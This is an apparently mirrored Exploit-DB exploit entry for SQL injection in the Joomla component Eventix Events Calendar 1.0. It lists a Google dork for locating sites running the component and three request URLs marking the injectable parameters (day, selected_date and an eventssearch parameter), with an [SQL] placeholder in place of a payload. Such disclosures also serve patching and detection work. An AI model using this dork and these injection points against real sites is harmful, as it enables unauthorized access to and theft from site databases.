Joomla! Component Eventix Events Calendar 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-02-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41407/
  • # # # # # 
    # Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
    # Google Dork: inurl:index.php?option=com_eventix
    # Date: 21.02.2017
    # Vendor Homepage: http://informafix.fr/
    # Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
    # Demo: http://demo.informafix.fr/index.php?option=com_eventix
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
    # http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
    # http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
    # # # # #